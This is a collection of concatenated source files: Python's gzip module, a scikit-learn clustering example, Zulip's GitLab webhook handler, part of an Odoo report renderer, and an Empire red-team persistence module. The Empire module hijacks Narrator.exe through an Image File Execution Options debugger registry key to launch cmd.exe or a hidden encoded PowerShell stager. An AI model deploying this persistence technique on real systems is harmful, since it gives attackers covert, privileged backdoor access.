            raise IOError(errno.EBADF, "read() on write-only GzipFile object")
        if self.extrasize <= 0 and self.fileobj is None:
            return ''
        readsize = 1024
        if size < 0:        # get the whole thing
            try:
                while True:
                    self._read(readsize)
                    readsize = min(self.max_read_chunk, readsize * 2)
            except EOFError:
                size = self.extrasize
        else:               # just get some more of it
            try:
                while size > self.extrasize:
                    self._read(readsize)
                    readsize = min(self.max_read_chunk, readsize * 2)
            except EOFError:
                if size > self.extrasize:
                    size = self.extrasize
        offset = self.offset - self.extrastart
        chunk = self.extrabuf[offset: offset + size]
        self.extrasize = self.extrasize - size
        self.offset += size
        return chunk
    def _unread(self, buf):
        # Push *buf* back into the buffered region (used by readline()).
        self.extrasize = len(buf) + self.extrasize
        self.offset -= len(buf)
    def _read(self, size=1024):
        # Decompress one chunk from the underlying file into the buffer;
        # raises EOFError when the stream is exhausted.
        if self.fileobj is None:
            raise EOFError, "Reached EOF"
        if self._new_member:
            # If the _new_member flag is set, we have to
            # jump to the next member, if there is one.
            #
            # First, check if we're at the end of the file;
            # if so, it's time to stop; no more members to read.
            pos = self.fileobj.tell()   # Save current position
            self.fileobj.seek(0, 2)     # Seek to end of file
            if pos == self.fileobj.tell():
                raise EOFError, "Reached EOF"
            else:
                self.fileobj.seek( pos ) # Return to original position
            self._init_read()
            self._read_gzip_header()
            self.decompress = zlib.decompressobj(-zlib.MAX_WBITS)
            self._new_member = False
        # Read a chunk of data from the file
        buf = self.fileobj.read(size)
        # If the EOF has been reached, flush the decompression object
        # and mark this object as finished.
        if buf == "":
            uncompress = self.decompress.flush()
            self._read_eof()
            self._add_read_data( uncompress )
            raise EOFError, 'Reached EOF'
        uncompress = self.decompress.decompress(buf)
        self._add_read_data( uncompress )
        if self.decompress.unused_data != "":
            # Ending case: we've come to the end of a member in the file,
            # so seek back to the start of the unused data, finish up
            # this member, and read a new gzip header.
            # (The number of bytes to seek back is the length of the unused
            # data, minus 8 because _read_eof() will rewind a further 8 bytes)
            self.fileobj.seek( -len(self.decompress.unused_data)+8, 1)
            # Check the CRC and file size, and set the flag so we read
            # a new member on the next call
            self._read_eof()
            self._new_member = True
    def _add_read_data(self, data):
        # Append freshly decompressed *data* to the buffer and update
        # the running CRC and uncompressed size.
        self.crc = zlib.crc32(data, self.crc) & 0xffffffffL
        offset = self.offset - self.extrastart
        self.extrabuf = self.extrabuf[offset:] + data
        self.extrasize = self.extrasize + len(data)
        self.extrastart = self.offset
        self.size = self.size + len(data)
    def _read_eof(self):
        # We've read to the end of the file, so we have to rewind in order
        # to reread the 8 bytes containing the CRC and the file size.
        # We check the that the computed CRC and size of the
        # uncompressed data matches the stored values.  Note that the size
        # stored is the true file size mod 2**32.
        self.fileobj.seek(-8, 1)
        crc32 = read32(self.fileobj)
        isize = read32(self.fileobj)  # may exceed 2GB
        if crc32 != self.crc:
            raise IOError("CRC check failed %s != %s" % (hex(crc32),
                                                         hex(self.crc)))
        elif isize != (self.size & 0xffffffffL):
            raise IOError, "Incorrect length of data produced"
        # Gzip files can be padded with zeroes and still have archives.
        # Consume all zero bytes and set the file position to the first
        # non-zero byte. See http://www.gzip.org/#faq8
        c = "\x00"
        while c == "\x00":
            c = self.fileobj.read(1)
        if c:
            self.fileobj.seek(-1, 1)
    @property
    def closed(self):
        # Closed once the underlying file reference has been dropped.
        return self.fileobj is None
    def close(self):
        # In write mode, flush the compressor and append the gzip trailer
        # (CRC32 + size mod 2**32) before releasing the file object.
        if self.fileobj is None:
            return
        if self.mode == WRITE:
            self.fileobj.write(self.compress.flush())
            write32u(self.fileobj, self.crc)
            # self.size may exceed 2GB, or even 4GB
            write32u(self.fileobj, self.size & 0xffffffffL)
            self.fileobj = None
        elif self.mode == READ:
            self.fileobj = None
        if self.myfileobj:
            self.myfileobj.close()
            self.myfileobj = None
    def flush(self,zlib_mode=zlib.Z_SYNC_FLUSH):
        # Flush pending compressed data through to the underlying file.
        self._check_closed()
        if self.mode == WRITE:
            # Ensure the compressor's buffer is flushed
            self.fileobj.write(self.compress.flush(zlib_mode))
            self.fileobj.flush()
    def fileno(self):
        """Invoke the underlying file object's fileno() method.
        This will raise AttributeError if the underlying file object
        doesn't support fileno().
        """
        return self.fileobj.fileno()
    def rewind(self):
        '''Return the uncompressed stream file position indicator to the
        beginning of the file'''
        if self.mode != READ:
            raise IOError("Can't rewind in write mode")
        self.fileobj.seek(0)
        self._new_member = True
        self.extrabuf = ""
        self.extrasize = 0
        self.extrastart = 0
        self.offset = 0
    def readable(self):
        return self.mode == READ
    def writable(self):
        return self.mode == WRITE
    def seekable(self):
        return True
    def seek(self, offset, whence=0):
        # Only SEEK_SET and SEEK_CUR are supported; write-mode forward seeks
        # are emulated by writing zero bytes, read-mode seeks by reading.
        if whence:
            if whence == 1:
                offset = self.offset + offset
            else:
                raise ValueError('Seek from end not supported')
        if self.mode == WRITE:
            if offset < self.offset:
                raise IOError('Negative seek in write mode')
            count = offset - self.offset
            for i in range(count // 1024):
                self.write(1024 * '\0')
            self.write((count % 1024) * '\0')
        elif self.mode == READ:
            if offset < self.offset:
                # for negative seek, rewind and do positive seek
                self.rewind()
            count = offset - self.offset
            for i in range(count // 1024):
                self.read(1024)
            self.read(count % 1024)
        return self.offset
    def readline(self, size=-1):
        # Return one line (up to *size* bytes); grows the read chunk size
        # adaptively via min_readsize to amortize repeated calls.
        if size < 0:
            # Shortcut common case - newline found in buffer.
            offset = self.offset - self.extrastart
            i = self.extrabuf.find('\n', offset) + 1
            if i > 0:
                self.extrasize -= i - offset
                self.offset += i - offset
                return self.extrabuf[offset: i]
            size = sys.maxint
            readsize = self.min_readsize
        else:
            readsize = size
        bufs = []
        while size != 0:
            c = self.read(readsize)
            i = c.find('\n')
            # We set i=size to break out of the loop under two
            # conditions: 1) there's no newline, and the chunk is
            # larger than size, or 2) there is a newline, but the
            # resulting line would be longer than 'size'.
            if (size <= i) or (i == -1 and len(c) > size):
                i = size - 1
            if i >= 0 or c == '':
                bufs.append(c[:i + 1])    # Add portion of last chunk
                self._unread(c[i + 1:])   # Push back rest of chunk
                break
            # Append chunk to list, decrease 'size',
            bufs.append(c)
            size = size - len(c)
            readsize = min(size, readsize * 2)
        if readsize > self.min_readsize:
            self.min_readsize = min(readsize, self.min_readsize * 2, 512)
        return ''.join(bufs) # Return resulting line
def _test():
    """Command-line driver: compress each argument like gzip, or decompress
    with -d like gunzip; '-' means stdin/stdout."""
    # Act like gzip; with -d, act like gunzip.
    # The input file is not deleted, however, nor are any other gzip
    # options or features supported.
    args = sys.argv[1:]
    decompress = args and args[0] == "-d"
    if decompress:
        args = args[1:]
    if not args:
        # No file arguments: filter stdin to stdout.
        args = ["-"]
    for arg in args:
        if decompress:
            if arg == "-":
                f = GzipFile(filename="", mode="rb", fileobj=sys.stdin)
                g = sys.stdout
            else:
                if arg[-3:] != ".gz":
                    print "filename doesn't end in .gz:", repr(arg)
                    continue
                f = open(arg, "rb")
                g = __builtin__.open(arg[:-3], "wb")
        else:
            if arg == "-":
                f = sys.stdin
                g = GzipFile(filename="", mode="wb", fileobj=sys.stdout)
            else:
                f = __builtin__.open(arg, "rb")
                g = open(arg + ".gz", "wb")
        # Copy in 1 KB chunks until EOF.
        while True:
            chunk = f.read(1024)
            if not chunk:
                break
            g.write(chunk)
        if g is not sys.stdout:
            g.close()
        if f is not sys.stdin:
            f.close()
# Run the command-line gzip/gunzip emulation when executed as a script.
if __name__ == '__main__':
    _test()
| apache-2.0 |
pasv/Empire | lib/modules/persistence/debugger/narrator.py | 20 | 5297 | from lib.common import helpers
class Module:
    """Empire persistence module: registers cmd.exe, an arbitrary binary, or a
    listener stager as the Image File Execution Options debugger for
    Narrator.exe, so it can be triggered from the ease-of-access center."""
    def __init__(self, mainMenu, params=[]):
        # Module metadata consumed by the Empire framework menus.
        self.info = {
            'Name': 'Invoke-Narrator',
            'Author': ['@harmj0y'],
            'Description': ("Sets the debugger for the text narrator (Narrator.exe) to be cmd.exe, "
                            "another binary of your choice, or a listern stager. This can be launched from "
                            "the ease-of-access center."),
            'Background' : False,
            'OutputExtension' : None,
            'NeedsAdmin' : True,
            'OpsecSafe' : False,
            'MinPSVersion' : '2',
            'Comments': [ ]
        }
        # any options needed by the module, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'Listener' : {
                'Description'   :   'Listener to use.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'RegPath' : {
                'Description'   :   'Registry location to store the script code. Last element is the key name.',
                'Required'      :   False,
                'Value'         :   'HKLM:Software\Microsoft\Network\debug'
            },
            'Cleanup' : {
                'Description'   :   'Switch. Disable the Narrator.exe debugger.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'Binary' : {
                'Description'   :   'Binary to set for the debugger.',
                'Required'      :   False,
                'Value'         :   'C:\Windows\System32\cmd.exe'
            }
        }
        # save off a copy of the mainMenu object to access external functionality
        #   like listeners/agent handlers/etc.
        self.mainMenu = mainMenu
        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value
    def generate(self):
        """Return the PowerShell script implementing the configured action:
        cleanup, stager-backed debugger, or plain binary debugger."""
        # management options
        cleanup = self.options['Cleanup']['Value']
        binary = self.options['Binary']['Value']
        listenerName = self.options['Listener']['Value']
        # storage options
        regPath = self.options['RegPath']['Value']
        statusMsg = ""
        locationString = ""
        if cleanup.lower() == 'true':
            # the registry command to disable the debugger for Narrator.exe
            script = "Remove-Item 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe';'Narrator.exe debugger removed.'"
            return script
        if listenerName != '':
            # if there's a listener specified, generate a stager and store it
            if not self.mainMenu.listeners.is_listener_valid(listenerName):
                # not a valid listener, return nothing for the script
                print helpers.color("[!] Invalid listener: " + listenerName)
                return ""
            else:
                # generate the PowerShell one-liner
                launcher = self.mainMenu.stagers.generate_launcher(listenerName)
                # keep only the base64-encoded payload portion of the launcher
                encScript = launcher.split(" ")[-1]
                # statusMsg += "using listener " + listenerName
                path = "\\".join(regPath.split("\\")[0:-1])
                name = regPath.split("\\")[-1]
                statusMsg += " stored in " + regPath + "."
                script = "$RegPath = '"+regPath+"';"
                script += "$parts = $RegPath.split('\\');"
                script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
                script += "$name = $parts[-1];"
                script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";"
                # note where the script is stored
                locationString = "$((gp "+path+" "+name+")."+name+")"
                script += "$null=New-Item -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe';$null=Set-ItemProperty -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe' -Name Debugger -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x="+locationString+";start -Win Hidden -A \\\"-enc $x\\\" powershell\";exit;';'Narrator.exe debugger set to trigger stager for listener "+listenerName+"'"
        else:
            # the registry command to set the debugger for Narrator.exe to be the binary path specified
            script = "$null=New-Item -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe';$null=Set-ItemProperty -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe' -Name Debugger -Value '"+binary+"';'Narrator.exe debugger set to "+binary+"'"
        return script
| bsd-3-clause |
appapantula/scikit-learn | examples/cluster/plot_agglomerative_clustering_metrics.py | 402 | 4492 | """
Agglomerative clustering with different metrics
===============================================
Demonstrates the effect of different metrics on the hierarchical clustering.
The example is engineered to show the effect of the choice of different
metrics. It is applied to waveforms, which can be seen as
high-dimensional vector. Indeed, the difference between metrics is
usually more pronounced in high dimension (in particular for euclidean
and cityblock).
We generate data from three groups of waveforms. Two of the waveforms
(waveform 1 and waveform 2) are proportional one to the other. The cosine
distance is invariant to a scaling of the data, as a result, it cannot
distinguish these two waveforms. Thus even with no noise, clustering
using this distance will not separate out waveform 1 and 2.
We add observation noise to these waveforms. We generate very sparse
noise: only 6% of the time points contain noise. As a result, the
l1 norm of this noise (ie "cityblock" distance) is much smaller than it's
l2 norm ("euclidean" distance). This can be seen on the inter-class
distance matrices: the values on the diagonal, that characterize the
spread of the class, are much bigger for the Euclidean distance than for
the cityblock distance.
When we apply clustering to the data, we find that the clustering
reflects what was in the distance matrices. Indeed, for the Euclidean
distance, the classes are ill-separated because of the noise, and thus
the clustering does not separate the waveforms. For the cityblock
distance, the separation is good and the waveform classes are recovered.
Finally, the cosine distance does not separate at all waveform 1 and 2,
thus the clustering puts them in the same cluster.
"""
# Author: Gael Varoquaux
# License: BSD 3-Clause or CC-0
import matplotlib.pyplot as plt
import numpy as np
from sklearn.cluster import AgglomerativeClustering
from sklearn.metrics import pairwise_distances
# Fix the RNG so the generated waveforms (and therefore the plots) are reproducible.
np.random.seed(0)
# Generate waveform data
n_features = 2000  # samples per waveform
t = np.pi * np.linspace(0, 1, n_features)  # time axis over [0, pi]
def sqr(x):
    """Square wave with the same sign pattern (and zero crossings) as cos(x)."""
    cosine = np.cos(x)
    return np.sign(cosine)
# Build 90 noisy waveforms: 30 per class, for three (phase, amplitude) classes.
# Classes 0 and 1 share the same shape up to scale (amplitudes .15 vs .6), so
# scale-invariant metrics (cosine) cannot separate them.
X = list()
y = list()
for i, (phi, a) in enumerate([(.5, .15), (.5, .6), (.3, .2)]):
    for _ in range(30):
        phase_noise = .01 * np.random.normal()
        amplitude_noise = .04 * np.random.normal()
        additional_noise = 1 - 2 * np.random.rand(n_features)
        # Make the noise sparse
        additional_noise[np.abs(additional_noise) < .997] = 0
        X.append(12 * ((a + amplitude_noise)
                 * (sqr(6 * (t + phi + phase_noise)))
                 + additional_noise))
        y.append(i)
X = np.array(X)
y = np.array(y)
n_clusters = 3
labels = ('Waveform 1', 'Waveform 2', 'Waveform 3')
# Plot the ground-truth labelling
plt.figure()
plt.axes([0, 0, 1, 1])
for l, c, n in zip(range(n_clusters), 'rgb',
                   labels):
    lines = plt.plot(X[y == l].T, c=c, alpha=.5)
    lines[0].set_label(n)
plt.legend(loc='best')
plt.axis('tight')
plt.axis('off')
plt.suptitle("Ground truth", size=20)
# Plot the distances
# For each metric, show the normalized matrix of mean inter-class distances;
# diagonal entries characterize each class's spread under that metric.
for index, metric in enumerate(["cosine", "euclidean", "cityblock"]):
    avg_dist = np.zeros((n_clusters, n_clusters))
    plt.figure(figsize=(5, 4.5))
    for i in range(n_clusters):
        for j in range(n_clusters):
            avg_dist[i, j] = pairwise_distances(X[y == i], X[y == j],
                                                metric=metric).mean()
    avg_dist /= avg_dist.max()
    for i in range(n_clusters):
        for j in range(n_clusters):
            plt.text(i, j, '%5.3f' % avg_dist[i, j],
                     verticalalignment='center',
                     horizontalalignment='center')
    plt.imshow(avg_dist, interpolation='nearest', cmap=plt.cm.gnuplot2,
               vmin=0)
    plt.xticks(range(n_clusters), labels, rotation=45)
    plt.yticks(range(n_clusters), labels)
    plt.colorbar()
    plt.suptitle("Interclass %s distances" % metric, size=18)
    plt.tight_layout()
# Plot clustering results
# Cluster with average linkage under each metric and color by cluster label.
for index, metric in enumerate(["cosine", "euclidean", "cityblock"]):
    model = AgglomerativeClustering(n_clusters=n_clusters,
                                    linkage="average", affinity=metric)
    model.fit(X)
    plt.figure()
    plt.axes([0, 0, 1, 1])
    for l, c in zip(np.arange(model.n_clusters), 'rgbk'):
        plt.plot(X[model.labels_ == l].T, c=c, alpha=.5)
    plt.axis('tight')
    plt.axis('off')
    plt.suptitle("AgglomerativeClustering(affinity=%s)" % metric, size=20)
plt.show()
| bsd-3-clause |
vikas-parashar/zulip | zerver/views/webhooks/gitlab.py | 6 | 13187 | from __future__ import absolute_import
from functools import partial
from zerver.lib.actions import check_send_message
from zerver.lib.response import json_success
from zerver.decorator import api_key_only_webhook_view, REQ, has_request_variables
from zerver.lib.webhooks.git import get_push_commits_event_message, EMPTY_SHA,\
get_remove_branch_event_message, get_pull_request_event_message,\
get_issue_event_message, SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE,\
get_commits_comment_action_message, get_push_tag_event_message
from zerver.models import Client, UserProfile
from django.http import HttpRequest, HttpResponse
from six import text_type
from typing import Dict, Any, Iterable, Optional
class UnknownEventType(Exception):
    """Signals a GitLab event type this webhook has no handler for."""
    pass
def get_push_event_body(payload):
    # type: (Dict[str, Any]) -> text_type
    """Dispatch a push payload: an all-zero 'after' SHA means the branch was deleted."""
    branch_was_removed = payload.get('after') == EMPTY_SHA
    if branch_was_removed:
        return get_remove_branch_event_body(payload)
    return get_normal_push_event_body(payload)
def get_normal_push_event_body(payload):
    # type: (Dict[str, Any]) -> text_type
    """Format a regular push (new commits on an existing branch)."""
    diff_url = u'{}/compare/{}...{}'.format(
        get_repository_homepage(payload),
        payload['before'],
        payload['after']
    )
    commits = []
    for commit in payload.get('commits'):
        commits.append({
            'sha': commit.get('id'),
            'message': commit.get('message'),
            'url': commit.get('url')
        })
    return get_push_commits_event_message(
        get_user_name(payload),
        diff_url,
        get_branch_name(payload),
        commits
    )
def get_remove_branch_event_body(payload):
    # type: (Dict[str, Any]) -> text_type
    """Format a push that deleted a branch."""
    pusher = get_user_name(payload)
    branch = get_branch_name(payload)
    return get_remove_branch_event_message(pusher, branch)
def get_tag_push_event_body(payload):
    # type: (Dict[str, Any]) -> text_type
    """Format a tag push; a present checkout_sha means the tag was pushed, not removed."""
    if payload.get('checkout_sha'):
        tag_action = "pushed"
    else:
        tag_action = "removed"
    return get_push_tag_event_message(
        get_user_name(payload),
        get_tag_name(payload),
        action=tag_action
    )
def get_issue_created_event_body(payload):
    # type: (Dict[str, Any]) -> text_type
    """Format a newly opened issue, including its description and assignee."""
    attrs = payload.get('object_attributes')
    return get_issue_event_message(
        get_issue_user_name(payload),
        'created',
        get_object_url(payload),
        attrs.get('iid'),
        attrs.get('description'),
        get_objects_assignee(payload)
    )
def get_issue_event_body(payload, action):
    # type: (Dict[str, Any], text_type) -> text_type
    """Format an issue state change (closed / reopened / updated)."""
    issue_iid = payload.get('object_attributes').get('iid')
    return get_issue_event_message(
        get_issue_user_name(payload),
        action,
        get_object_url(payload),
        issue_iid,
    )
def get_merge_request_updated_event_body(payload):
    # type: (Dict[str, Any]) -> text_type
    """An MR update carrying an 'oldrev' means new commits; otherwise a plain edit."""
    oldrev = payload.get('object_attributes').get('oldrev')
    if oldrev:
        return get_merge_request_event_body(payload, "added commit(s) to")
    return get_merge_request_open_or_updated_body(payload, "updated")
def get_merge_request_event_body(payload, action):
    # type: (Dict[str, Any], text_type) -> text_type
    """Short merge-request message: user, action and MR link only."""
    mr = payload.get('object_attributes')
    return get_pull_request_event_message(
        get_issue_user_name(payload),
        action,
        mr.get('url'),
        mr.get('iid'),
        type='MR',
    )
def get_merge_request_open_or_updated_body(payload, action):
    # type: (Dict[str, Any], text_type) -> text_type
    """Detailed merge-request message with branches, description and assignee."""
    mr = payload.get('object_attributes')
    return get_pull_request_event_message(
        get_issue_user_name(payload),
        action,
        mr.get('url'),
        mr.get('iid'),
        mr.get('source_branch'),
        mr.get('target_branch'),
        mr.get('description'),
        get_objects_assignee(payload),
        type='MR',
    )
def get_objects_assignee(payload):
    # type: (Dict[str, Any]) -> Optional[text_type]
    """Return the assignee's display name, or None when nobody is assigned.

    The previous version declared `-> text_type` yet fell off the end of the
    function (implicitly returning None) for unassigned objects; make the
    optional return explicit and correct the type comment.
    """
    assignee_object = payload.get('assignee')
    if assignee_object:
        return assignee_object.get('name')
    return None
def get_commented_commit_event_body(payload):
    # type: (Dict[str, Any]) -> text_type
    """Format a note left on a commit."""
    comment = payload.get('object_attributes')
    commit = payload.get('commit')
    action = u'[commented]({})'.format(comment['url'])
    return get_commits_comment_action_message(
        get_issue_user_name(payload),
        action,
        commit.get('url'),
        commit.get('id'),
        comment['note'],
    )
def get_commented_merge_request_event_body(payload):
    # type: (Dict[str, Any]) -> text_type
    """Format a note left on a merge request."""
    comment = payload.get('object_attributes')
    mr_iid = payload.get('merge_request').get('iid')
    action = u'[commented]({}) on'.format(comment['url'])
    url = u'{}/merge_requests/{}'.format(
        payload.get('project').get('web_url'),
        mr_iid
    )
    return get_pull_request_event_message(
        get_issue_user_name(payload),
        action,
        url,
        mr_iid,
        message=comment['note'],
        type='MR'
    )
def get_commented_issue_event_body(payload):
    # type: (Dict[str, Any]) -> text_type
    """Format a note left on an issue."""
    comment = payload.get('object_attributes')
    issue_iid = payload.get('issue').get('iid')
    action = u'[commented]({}) on'.format(comment['url'])
    url = u'{}/issues/{}'.format(
        payload.get('project').get('web_url'),
        issue_iid
    )
    return get_pull_request_event_message(
        get_issue_user_name(payload),
        action,
        url,
        issue_iid,
        message=comment['note'],
        type='Issue'
    )
def get_commented_snippet_event_body(payload):
    # type: (Dict[str, Any]) -> text_type
    """Format a note left on a snippet."""
    comment = payload.get('object_attributes')
    snippet_id = payload.get('snippet').get('id')
    action = u'[commented]({}) on'.format(comment['url'])
    url = u'{}/snippets/{}'.format(
        payload.get('project').get('web_url'),
        snippet_id
    )
    return get_pull_request_event_message(
        get_issue_user_name(payload),
        action,
        url,
        snippet_id,
        message=comment['note'],
        type='Snippet'
    )
def get_wiki_page_event_body(payload, action):
    # type: (Dict[str, Any], text_type) -> text_type
    """Format a wiki page creation or update."""
    attrs = payload.get('object_attributes')
    return u"{} {} [Wiki Page \"{}\"]({}).".format(
        get_issue_user_name(payload),
        action,
        attrs.get('title'),
        attrs.get('url'),
    )
def get_build_hook_event_body(payload):
    # type: (Dict[str, Any]) -> text_type
    """Format a CI build status change."""
    build_status = payload.get('build_status')
    # 'created' and 'running' get friendly phrasings; everything else is generic.
    status_phrases = {'created': 'was created', 'running': 'started'}
    action = status_phrases.get(
        build_status, 'changed status to {}'.format(build_status))
    return u"Build {} from {} stage {}.".format(
        payload.get('build_name'),
        payload.get('build_stage'),
        action
    )
def get_pipeline_event_body(payload):
    # type: (Dict[str, Any]) -> text_type
    """Format a pipeline status change, with a bullet line per build."""
    pipeline_status = payload.get('object_attributes').get('status')
    if pipeline_status == 'pending':
        action = 'was created'
    elif pipeline_status == 'running':
        action = 'started'
    else:
        action = 'changed status to {}'.format(pipeline_status)
    build_lines = [
        u"* {} - {}".format(build.get('name'), build.get('status'))
        for build in payload.get('builds')
    ]
    return u"Pipeline {} with build(s):\n{}.".format(action, u"\n".join(build_lines))
def get_repo_name(payload):
    # type: (Dict[str, Any]) -> text_type
    """Return the project name carried in the payload."""
    project = payload['project']
    return project['name']
def get_user_name(payload):
    # type: (Dict[str, Any]) -> text_type
    """Return the pusher's display name (push/tag-push payloads)."""
    user_name = payload['user_name']
    return user_name
def get_issue_user_name(payload):
    # type: (Dict[str, Any]) -> text_type
    """Return the acting user's display name (issue/MR/note payloads)."""
    user = payload['user']
    return user['name']
def get_repository_homepage(payload):
    # type: (Dict[str, Any]) -> text_type
    """Return the repository homepage URL from a push payload."""
    repository = payload['repository']
    return repository['homepage']
def get_branch_name(payload):
    # type: (Dict[str, Any]) -> text_type
    """Strip the 'refs/heads/' prefix from the payload ref."""
    ref = payload['ref']
    return ref.replace('refs/heads/', '')
def get_tag_name(payload):
    # type: (Dict[str, Any]) -> text_type
    """Strip the 'refs/tags/' prefix from the payload ref."""
    ref = payload['ref']
    return ref.replace('refs/tags/', '')
def get_object_iid(payload):
    # type: (Dict[str, Any]) -> text_type
    """Return the project-scoped id (iid) of the event's object."""
    attrs = payload['object_attributes']
    return attrs['iid']
def get_object_url(payload):
    # type: (Dict[str, Any]) -> text_type
    """Return the web URL of the event's object."""
    attrs = payload['object_attributes']
    return attrs['url']
# Maps the event name computed by get_event() (the X-Gitlab-Event header,
# possibly suffixed with an action or noteable type) to the function that
# renders the message body for that event.
EVENT_FUNCTION_MAPPER = {
    'Push Hook': get_push_event_body,
    'Tag Push Hook': get_tag_push_event_body,
    'Issue Hook open': get_issue_created_event_body,
    'Issue Hook close': partial(get_issue_event_body, action='closed'),
    'Issue Hook reopen': partial(get_issue_event_body, action='reopened'),
    'Issue Hook update': partial(get_issue_event_body, action='updated'),
    'Note Hook Commit': get_commented_commit_event_body,
    'Note Hook MergeRequest': get_commented_merge_request_event_body,
    'Note Hook Issue': get_commented_issue_event_body,
    'Note Hook Snippet': get_commented_snippet_event_body,
    'Merge Request Hook open': partial(get_merge_request_open_or_updated_body, action='created'),
    'Merge Request Hook update': get_merge_request_updated_event_body,
    'Merge Request Hook merge': partial(get_merge_request_event_body, action='merged'),
    'Merge Request Hook close': partial(get_merge_request_event_body, action='closed'),
    'Wiki Page Hook create': partial(get_wiki_page_event_body, action='created'),
    'Wiki Page Hook update': partial(get_wiki_page_event_body, action='updated'),
    'Build Hook': get_build_hook_event_body,
    'Pipeline Hook': get_pipeline_event_body,
}
@api_key_only_webhook_view("Gitlab")
@has_request_variables
def api_gitlab_webhook(request, user_profile, client,
                       stream=REQ(default='gitlab'),
                       payload=REQ(argument_type='body')):
    # type: (HttpRequest, UserProfile, Client, text_type, Dict[str, Any]) -> HttpResponse
    """Webhook entry point: render the GitLab event and send it to a stream."""
    event = get_event(request, payload)
    body_renderer = get_body_based_on_event(event)
    message_body = body_renderer(payload)
    topic = get_subject_based_on_event(event, payload)
    check_send_message(user_profile, client, 'stream', [stream], topic, message_body)
    return json_success()
def get_body_based_on_event(event):
    # type: (str) -> Any
    """Look up the body-formatting function registered for *event*."""
    handler = EVENT_FUNCTION_MAPPER[event]
    return handler
def get_subject_based_on_event(event, payload):
    # type: (str, Dict[str, Any]) -> text_type
    """Compose the stream topic (subject) for *event* from its *payload*."""
    if event == 'Push Hook':
        return u"{} / {}".format(get_repo_name(payload), get_branch_name(payload))
    if event == 'Build Hook':
        repo = payload.get('repository').get('name')
        return u"{} / {}".format(repo, get_branch_name(payload))
    if event == 'Pipeline Hook':
        branch = payload.get('object_attributes').get('ref').replace('refs/heads/', '')
        return u"{} / {}".format(get_repo_name(payload), branch)
    if event.startswith('Merge Request Hook'):
        attrs = payload.get('object_attributes')
        return SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE.format(
            repo=get_repo_name(payload),
            type='MR',
            id=attrs.get('iid'),
            title=attrs.get('title')
        )
    if event.startswith('Issue Hook'):
        attrs = payload.get('object_attributes')
        return SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE.format(
            repo=get_repo_name(payload),
            type='Issue',
            id=attrs.get('iid'),
            title=attrs.get('title')
        )
    if event == 'Note Hook Issue':
        issue = payload.get('issue')
        return SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE.format(
            repo=get_repo_name(payload),
            type='Issue',
            id=issue.get('iid'),
            title=issue.get('title')
        )
    if event == 'Note Hook MergeRequest':
        merge_request = payload.get('merge_request')
        return SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE.format(
            repo=get_repo_name(payload),
            type='MR',
            id=merge_request.get('iid'),
            title=merge_request.get('title')
        )
    if event == 'Note Hook Snippet':
        snippet = payload.get('snippet')
        return SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE.format(
            repo=get_repo_name(payload),
            type='Snippet',
            id=snippet.get('id'),
            title=snippet.get('title')
        )
    # Fallback for events with no special topic format.
    return get_repo_name(payload)
def get_event(request, payload):
    # type: (HttpRequest, Dict[str, Any]) -> str
    """Derive the internal event name from the X-Gitlab-Event header.

    Some hook types are further qualified with a payload attribute so that
    each (event, action) pair can map to its own body formatter.

    Raises:
        UnknownEventType: if the resulting name has no registered handler.
    """
    event = request.META['HTTP_X_GITLAB_EVENT']
    # These hooks all qualify the event with object_attributes.action;
    # the original duplicated this extraction in three identical branches.
    if event in ('Issue Hook', 'Merge Request Hook', 'Wiki Page Hook'):
        action = payload.get('object_attributes').get('action')
        event = "{} {}".format(event, action)
    elif event == 'Note Hook':
        action = payload.get('object_attributes').get('noteable_type')
        event = "{} {}".format(event, action)
    # Membership test on the dict directly; no need to materialize the keys.
    if event in EVENT_FUNCTION_MAPPER:
        return event
    raise UnknownEventType(u'Event {} is unknown and cannot be handled'.format(event))
| apache-2.0 |
OpusVL/odoo | openerp/report/render/rml2txt/rml2txt.py | 8 | 16392 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009, P. Christeas, Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import sys
import StringIO
from lxml import etree
import utils
Font_size= 10.0
def verbose(text):
    """Write a diagnostic message (plus newline) to stderr."""
    sys.stderr.write("%s\n" % text)
class textbox(object):
    """A box containing plain text.

    It can have an offset, in chars.
    Lines can be either text strings, or textbox'es, recursively.
    """
    def __init__(self, x=0, y=0):
        self.posx = x          # horizontal offset, in characters
        self.posy = y          # vertical offset, in lines
        self.lines = []        # finished lines (strings)
        self.curline = ''      # line currently being assembled
        self.endspace = False  # did the last appended chunk end in whitespace?

    def newline(self):
        """Close the current line (even if empty) and start a new one."""
        if isinstance(self.curline, textbox):
